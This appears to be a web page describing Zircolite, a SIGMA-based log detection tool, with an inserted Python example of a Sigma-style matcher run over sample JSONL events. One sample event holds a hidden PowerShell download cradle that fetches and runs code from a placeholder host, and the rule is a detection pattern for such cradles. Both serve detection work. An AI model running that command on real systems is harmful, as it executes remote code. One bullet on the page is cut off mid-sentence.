Zircolite – A Standalone SIGMA-based Detection Tool For EVTX, Auditd And Sysmon For Linux Logs
Standalone SIGMA-based detection tool for EVTX, Auditd, Sysmon for Linux or JSONL/NDJSON logs
Zircolite is a standalone tool written in Python 3. It allows the use of SIGMA rules on MS Windows EVTX (EVTX and JSONL format), Auditd logs and Sysmon for Linux logs.
- Zircolite can be used directly on the investigated endpoint (use
The Mini-GUI can be used completely offline; it lets the user display and search results. To learn how to use the Mini-GUI, check the docs here.
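To make concrete what "using SIGMA rules on JSONL/NDJSON logs" means, here is an added, self-contained matcher that is not Zircolite's own code and not a rule from the Sigma project. It assumes the usual Sigma rule layout (named selections under `detection`, field modifiers such as `|contains` and `|endswith`, list values OR'ed together, and a `condition` string combining the selections), applies a constructed rule to a few constructed JSONL events, and skips corrupt lines instead of aborting the scan:

```python
"""Minimal Sigma-style matcher over JSONL/NDJSON events (added example, not Zircolite code)."""
import json
import re

# Constructed rule in Sigma layout (assumption: not a rule shipped with Zircolite or Sigma).
RULE = {
    "title": "PowerShell download cradle (constructed example rule)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "IEX"],
        },
        "filter": {"ParentImage|endswith": "\\msiexec.exe"},
        "condition": "selection and not filter",
    },
}

# Constructed JSONL events (raw string: JSON "\\" decodes to a single backslash).
# The last line is deliberately truncated to show how corrupt input is handled.
SAMPLE_JSONL = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -c Invoke-WebRequest http://example.invalid/b", "ParentImage": "C:\\Windows\\System32\\msiexec.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c dir", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell Get-Process", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\
"""


def _match_field(event, key, expected):
    """Match one 'Field|modifier' entry; list values are OR'ed; strings compare case-insensitively as in Sigma."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    actual = str(actual)
    for want in expected if isinstance(expected, list) else [expected]:
        want = str(want)
        if modifier == "":
            ok = actual.lower() == want.lower()
        elif modifier == "contains":
            ok = want.lower() in actual.lower()
        elif modifier == "startswith":
            ok = actual.lower().startswith(want.lower())
        elif modifier == "endswith":
            ok = actual.lower().endswith(want.lower())
        elif modifier == "re":
            ok = re.search(want, actual) is not None
        else:
            raise ValueError(f"unsupported modifier: {modifier}")
        if ok:
            return True
    return False


def _match_selection(event, selection):
    """All fields of a selection map must match (AND)."""
    return all(_match_field(event, k, v) for k, v in selection.items())


def _eval_condition(condition, results):
    """Evaluate 'a and not (b or c)'-style conditions with a tiny recursive-descent parser (no eval)."""
    tokens = re.findall(r"\(|\)|[A-Za-z_][A-Za-z0-9_]*", condition)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def expr():  # expr := term ('or' term)*
        val = term()
        while peek() == "or":
            take()
            rhs = term()
            val = val or rhs
        return val

    def term():  # term := factor ('and' factor)*
        val = factor()
        while peek() == "and":
            take()
            rhs = factor()
            val = val and rhs
        return val

    def factor():  # factor := 'not' factor | '(' expr ')' | NAME
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            val = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return val
        if tok not in results:
            raise ValueError(f"unknown selection in condition: {tok}")
        return results[tok]

    val = expr()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return val


def evaluate(rule, event):
    """True when the rule's condition holds for this event."""
    detection = rule["detection"]
    results = {n: _match_selection(event, s) for n, s in detection.items() if n != "condition"}
    return _eval_condition(detection["condition"], results)


def scan_jsonl(rule, jsonl_text):
    """Return the events the rule matches; unparsable lines are skipped, not fatal."""
    hits = []
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if evaluate(rule, event):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in scan_jsonl(RULE, SAMPLE_JSONL):
        print(RULE["title"], "->", hit["CommandLine"])
```

Of the five constructed lines, only the first is reported: the second matches the selection but is excluded by the `filter` selection, the third and fourth fail the selection, and the truncated fifth line is skipped. Real EVTX-to-JSONL conversions (and Auditd or Sysmon for Linux exports) use different field names, so the rule's field names are the part a practitioner adapts; the matching and condition logic stays the same.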
Battle-tested
Zircolite has been used to perform cold analysis (in a lab) on EVTX in multiple “real-life” situations. However, even though Zircolite has been used many times to perform analysis directly on a Microsoft Windows endpoint, there is not yet a pipeline to thoroughly test every release.
License
- All the code of the project is licensed under the GNU Lesser General Public License
- evtx_dump is under the MIT license
- The rules are released under the Detection Rule License (DRL) 1.0
Download Zircolite